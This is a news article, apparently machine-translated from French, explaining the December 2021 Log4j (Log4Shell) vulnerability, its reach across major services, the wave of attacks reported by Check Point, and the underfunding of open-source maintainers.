Log4j: the computer flaw that shakes the Net on its foundations
Alerts have been mounting in recent days about a new flaw discovered in a tiny, innocent-looking sub-software that is used by hundreds of millions, if not billions, of websites around the world.
It's like a tsunami sweeping the Internet for some, it would be the "worst flaw of the decade" or even "history of the Net" for others. Computer security experts vie for superlatives to conjure up the discovery of a vulnerability that could affect hundreds of millions, if not more than a billion, of websites and servers around the world.
Even the Cybersecurity and Infrastructure Security Agency (CISA) has made it a threat of rank 10, which is the maximum alert level. "This is one of the most serious flaws, if not the most serious, that I have been confronted with since the start of my career", admitted Jennifer Easterly, director of the CISA, during a press briefing. Monday 13 December . Alerts have been issued by almost all national IT security agencies, including Anssi in France .
The person responsible for this movement of global panic is called Log4j. It is a small sub-software whose sole purpose is to "keep an automated log of visits to a site", explains Philippe Rondel, computer security researcher for Check Point, an international software solutions publisher. cybersecurity, contacted by France 24. A rather innocuous task and, indeed, "it is typically a small piece of program which one would never have believed that it was going to present a risk", adds this expert.
Except that at the end of November, an employee of the Chinese giant Alibaba discreetly alerts the Apache foundation (which manages and distributes Log4j) of the vulnerabilities he observed at Log4j. Then, Friday, December 10, a computer security researcher made public a way to exploit this computer flaw called Log4Shell : it was the start of the runaway.
The digital world then begins to see the potential extent of the damage. The sub-software is indeed present in thousands of programs used to run millions of servers, and the developers of all these web tools sometimes do not even know if their software calls for it.
A race to understand how exposed the Internet is to this new vulnerability then begins. "It is estimated that there are around 30% of websites that use Log4j", summarizes Philippe Rondel.
For the time being, it has been established that giants such as NASA, Twitter, Oracle or Apple use programs where the Log4j vulnerability is present. Thus, iCloud - Apple's online storage service - could be hacked thanks to this flaw. In theory, Ingenuity, the small helicopter that NASA sent to Mars, is also vulnerable since some software used to communicate with it from Earth is based on Log4j, underlines the German daily Süddeutsche Zeitung .
On the side of hackers and cyber spies, it is also the rush for the new flaw. "We observed 830,000 attempted attacks targeting Check Point customers in 72 hours," said Philippe Rondel. In addition, more than 60 variants of the original method for exploiting Log4Shell are already in circulation. One way for cybercriminals to try to stay ahead of the game.
This increase in attacks is partly due to the fact that cybercriminals "anticipate a short-lived firing window", assures Philippe Rondel. A patch for Log4j has been released, and in theory it would suffice to apply it wherever this sub-software is installed. But according to the expert from Check Point, it will take time in practice, because discovering all the programs and servers that use it is a long-term task.
Hackers have also jumped at this loophole because it is very easy to exploit and can do enormous damage. The vulnerability means that an attacker can ask Log4j to perform any type of task - including downloading a virus - by tricking it into believing that it is simply updating its visit log.
It is all the more enticing that it allows cybercriminals "to execute malicious code on a program without needing authorization", summarizes Philippe Rondel. A cybercriminal must generally have a username and password before they can infiltrate a server and place their virus there. This is not the case with Log4Shell.
And the attackers then have full latitude to take advantage of this flaw. They can install a simple destructive virus on the targeted server, opt instead for spyware or take control of computers on the network.
So far, cybercriminals have mostly used Log4Shell to install malware on targeted computers to turn them into bitcoin machines. "It is one of the simplest uses", recognizes Philippe Rondel.
But he fears that this first wave of attacks is only a "first earthquake before the tsunami of larger attacks to come." The risk is that certain cybercriminals use this flaw to "put a first foot in the door of the corporate network in order to deploy ransomware which will be activated in the coming weeks", warns the French expert.
The discovery of the flaw also illustrates the fragility of certain components that are important for the proper functioning of the Internet. Log4j is, in effect, a small piece of a program distributed as free software. Its proper functioning is ensured by a few volunteers who take care of it in their free time. In other words, multinationals like Apple or Twitter use sub-software managed by a handful of individuals barely paid by a few generous donors for their services or devices that bring in billions. For Filippo Valsorda, a Google cryptography expert , the Log4j flaw should lead "to making the maintenance of these open source programs a real paid profession because it is a part of the economy that depends on it".